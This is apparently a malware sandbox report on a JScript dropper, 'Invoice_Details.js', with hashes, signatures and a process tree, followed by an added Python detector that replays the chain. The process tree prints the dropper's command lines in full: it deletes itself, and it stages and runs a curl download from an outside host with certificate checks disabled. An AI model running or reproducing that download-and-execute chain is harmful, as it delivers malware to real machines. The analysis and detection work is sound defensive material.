Analysis
max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20230712-en
resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
submitted: 18-07-2023 16:40
Static task: static1
Behavioral task: behavioral1
Sample: Invoice_Details.js
Resource: win7-20230712-en
General
Target: Invoice_Details.js
Size: 42KB
MD5: 22067f54377e90dc3fdd5f384c1fe3ee
SHA1: 56b2afbc94b67f1c1f5e0a2340e25ca066b9baad
SHA256: 5e5722af27fc7ae05a9f9705ce1d680fec5fef27a67019c37e2bd768c8e7c07e
SHA512: af74c25ae0cc74316411d129d7c0a13e81efe0b0cbb207c1e45e323288364b36d1b2d383af5161efb3a7c491494b67bfee90ec8c97420a956b623eb4f12bfe56
SSDEEP: 384:kac3is6ZeUS1ogXzxmOP0U4OmB/P9rVOKeHBYH8Ffu+wtizOdKUmJYgqEq4SjoaM:/7ylm9FgH1gTP5C1XfW51TJfmh1EE
Malware Config
Signatures

Deletes itself (1 IoC)
  Processes: cmd.exe, PID 2380

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (9 IoCs)
  Processes (source PID and image, target PID and image):
  2780 wscript.exe wrote to memory of 2380 cmd.exe (3 entries)
  2780 wscript.exe wrote to memory of 2844 cmd.exe (3 entries)
  2780 wscript.exe wrote to memory of 2900 cmd.exe (3 entries)
  Note: all nine writes are from the script host into the three cmd.exe children it spawned. A parent writing into a newly created child's address space is part of normal process creation, so this signature on its own is not evidence of code injection; the relevant behaviour is in the child command lines below.
Processes

[1] C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js
    Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js"
      Deletes itself

  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo curl http://cajaminoretino.site/signed/3939.7z --output "C:\Users\Admin\AppData\Local\Temp\magnam.t" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"

  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"

Summary of the chain: the JScript dropper, run by wscript.exe, first deletes its own file, then writes a one-line batch file whose only content is a curl command that fetches http://cajaminoretino.site/signed/3939.7z into magnam.t with certificate validation and revocation checking disabled (--insecure, --ssl-no-revoke) and redirects followed (--location), and finally executes that batch file. Note that curl.exe is not shipped with Windows 7 (it is built into Windows 10 1803 and later), so on this analysis image the batch stage cannot complete the download on its own.
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat
Filesize: 141B
MD5: 81645f19426feb8cef198e042710cf15
SHA1: 864554e97313c0d6c8e38008ebf92c6a215ac56f
SHA256: 2e57a524f3da47467fc1abce82df02f2f4b16406480dadf2d48e7d992b89aba0
SHA512: 61b9a948b472ddc5d70884bc41f944fa760ca8628d64d768cf13d33c3f54610c693b0d9a6f12b31e9bcfebac5691c8365bb7f8740ec6b589e2955efe3063c5e5
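As an added example that is not part of the sandbox report: a small Python detector, written here, that replays the process tree above as process-creation events and flags the three behaviours the signatures describe: a script host spawning cmd.exe to delete its own script, to stage a curl downloader with TLS validation disabled, and to run the staged batch file. It also reconstructs the bytes that `cmd /c echo ... > file` writes to explicabo.m.bat, which comes to the 141 bytes listed under Downloads. Images and command lines are copied from the report; the PIDs 2844 and 2900 for the echo and batch-execution children are assumed from the order of the WriteProcessMemory entries, and the parent PID 1234 of wscript.exe is invented.

```python
import hashlib
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# curl flags that switch off certificate or revocation checking; a dropped
# downloader that sets these is the detail worth alerting on.
WEAK_TLS_FLAGS = ("--insecure", "--ssl-no-revoke")

# Constructed process-creation events modelled on the report's process tree.
# PIDs 2844/2900 are an assumed mapping (order of the WriteProcessMemory
# entries); ppid 1234 for wscript.exe is invented.
EVENTS = [
    {"pid": 2780, "ppid": 1234, "image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js"},
    {"pid": 2380, "ppid": 2780, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Invoice_Details.js"'},
    {"pid": 2844, "ppid": 2780, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c echo curl http://cajaminoretino.site/signed/3939.7z --output "C:\Users\Admin\AppData\Local\Temp\magnam.t" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"'},
    {"pid": 2900, "ppid": 2780, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\explicabo.m.bat"'},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def script_path(cmdline):
    """Path of the script a Windows script host was launched with, if any."""
    m = re.search(r'"?([^"\s]+\.(?:js|jse|vbs|vbe|wsf))"?', cmdline, re.I)
    return m.group(1) if m else None


def detect(events):
    """Return (kind, pid, detail) findings for cmd.exe children of a script host.

    Events must be in creation order: the batch-execution check needs to have
    seen the echo that staged the file first.
    """
    by_pid = {e["pid"]: e for e in events}
    findings, staged = [], None
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        if basename(e["image"]) != "cmd.exe":
            continue
        cl, low = e["cmdline"], e["cmdline"].lower()
        # 1. the child deletes the very script its parent is running
        script = script_path(parent["cmdline"])
        if script and re.search(r"\bdel\b", low) and script.lower() in low:
            findings.append(("self_delete", e["pid"], script))
        # 2. echo ... curl <url> ... > something.bat  (downloader written to disk)
        m = re.search(r'\becho\b.*\bcurl\b.*?(https?://\S+).*>\s*"?([^"]+\.bat)"?',
                      cl, re.I | re.S)
        if m:
            staged = m.group(2)
            flags = [f for f in WEAK_TLS_FLAGS if f in low]
            findings.append(("staged_download", e["pid"], (m.group(1), staged, flags)))
        # 3. the staged batch file is then executed by another cmd.exe child
        elif staged and staged.lower() in low:
            findings.append(("runs_staged_batch", e["pid"], staged))
    return findings


def echoed_bytes(cmdline):
    """Reconstruct what `cmd /c echo TEXT > FILE` writes to FILE: TEXT up to the
    redirect operator, trailing space included, followed by CRLF."""
    m = re.search(r"\becho (.*?)>", cmdline, re.I)
    if not m:
        return None
    return m.group(1).encode() + b"\r\n"


def staged_file_summary(cmdline):
    """Size, MD5 and content of the reconstructed batch file. The MD5 can be
    compared with the Downloads entry; a mismatch would mean the file was
    written differently from this reconstruction (e.g. no trailing space)."""
    data = echoed_bytes(cmdline)
    return {"size": len(data), "md5": hashlib.md5(data).hexdigest(),
            "content": data.decode()}


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
    print(staged_file_summary(EVENTS[2]["cmdline"]))
```

The checks key on the parent being a script host, which is what separates this chain from an administrator typing the same curl line at a prompt; the weak-TLS flags and the self-delete are the fields to carry into an alert.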